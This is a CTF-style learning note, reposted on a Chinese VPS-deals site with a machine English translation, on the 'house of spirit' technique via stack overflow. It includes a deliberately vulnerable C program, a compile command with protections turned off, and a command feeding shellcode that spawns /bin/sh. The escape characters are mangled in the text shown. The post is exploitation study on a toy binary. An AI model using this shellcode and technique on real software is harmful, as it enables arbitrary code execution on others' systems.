主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情! |
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作 |
学习了一下L-CTF中介绍的一个栈溢出利用技巧,记录一下。
样例代码如下:
/*
* blackngel's vulnerable program slightly modified by gb_master
*/
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
编译命令如下:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
Ubuntu 14 Server里编译需要安装一下开发包,否则会报错sys/cdefs.h文件找不到:
sudo apt-get install libc6-dev-i386
这里关键思路是:通过溢出修改局部变量的地址为栈中的一个地址,将伪造地址中的size字段设置成一个fastbin的有效大小,以便能成功将其free,后面的malloc将把此块内存重新申请并使用,snprintf函数再向其中写入数据,从而可以覆盖函数返回地址,最终getshell。
局部变量的内存分布如下:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
样例测试命令如下:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
这里有点问题,通过GDB调试可以getshell,直接执行则报段错误:
Learn a stack overflow utilization technique introduced in l-ctf and record it.
The sle code is as follows:
/ *
* blackngel's vulnerable program slightly modified by gb_master
* /
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
The compile command is as follows:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
To compile in Ubuntu 14 server, you need to install the following development package. Otherwise, an error will be reported. The sys / cdefs. H file cannot be found:
sudo apt-get install libc6-dev-i386
The key idea here is: change the address of local variable to an address in the stack through overflow, set the size field in the forged address to an effective size of fastbin, so that it can be free successfully, and malloc will reapply and use this block of memory, and snprintf function will write data to it, so that the return address of the function can be overwritten, and finally get shell.
The memory distribution of local variables is as follows:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
The sle test command is as follows:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
There is a problem here. You can get the shell through GDB debugging. If you execute directly, a segment error will be reported:
--------------------------------------------------------------
主机参考,收集国内外VPS,VPS测评,主机测评,云服务器,虚拟主机,独立服务器,国内外服务器,高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台
这几篇文章你可能也喜欢:
- 天空云:香港CN2弹性大带宽云服务器,1核1G内存,月付27.55元,简单评测。
- 搬瓦工VPS,限量款套餐补货,美国CN2 GIA/日本软银/荷兰AS9929,1Gbps超大高端网络线路,KVM虚拟架构,1核1G内存1Gbps带宽,80美元/年,机房可随意切换
- CloudCone,美国Win系统VPS云服务器少量补货,美国洛杉矶MC机房,KVM虚拟架构,3核4G内存1Gbps带宽,17.49美元/月
- LOCVPS,双12特惠,香港免备案VPS云服务器终身65折,香港葵湾机房,CN2+BGP/CN2网络,KVM虚拟架构,1核2G内存2Mbps带宽不限流量,29.25元/月
- 恒创科技,全场3折优惠起,免备案香港VPS云服务器低至28元/月,香港/美国,新增多款特价服务器,1核1G内存5Mbps带宽不限流量,292元/年
本文由主机参考刊发,转载请注明:【溢出利用技巧】house of spirit friendly stack overflow https://zhujicankao.com/12451.html
评论前必须登录!
注册